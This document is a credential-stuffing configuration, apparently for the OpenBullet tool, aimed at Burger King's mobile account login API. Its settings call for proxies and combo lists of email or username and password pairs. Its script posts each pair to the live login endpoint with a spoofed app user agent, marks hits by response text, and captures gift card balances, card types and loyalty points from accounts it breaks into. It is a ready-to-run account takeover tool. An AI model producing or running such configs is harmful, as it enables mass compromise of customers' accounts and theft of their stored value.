[SETTINGS]
{
  "Name": "BurgerKing",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2019-07-14T21:26:05.6677828-07:00",
  "AdditionalInfo": "",
  "Author": "DoboJ",
  "Version": "1.3.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://bkm-native-prod.tillster.com/mobile-aggregation-service/rest/account/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Burger%20King/2 CFNetwork/974.2.1 Darwin/18.0.0" 
  HEADER "Pragma: no-cache" 
  HEADER "tenant: bk-us-native" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalid username and/or password" 
  KEYCHAIN Success OR 
    KEY "userType" 

PARSE "<SOURCE>" JSON "giftCardDetailedBalanceList" -> CAP "GCBalance" 

PARSE "<SOURCE>" LR "\"cardType\":\"" "\",\"maskedCardNumber\"" -> CAP "Cards" 

PARSE "<SOURCE>" JSON "loyaltyPoints" -> CAP "loyaltyPoints" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<SOURCE>" DoesNotContain "maskedCardNumber" 
  KEYCHAIN Success OR 
    KEY "maskedCardNumber" 

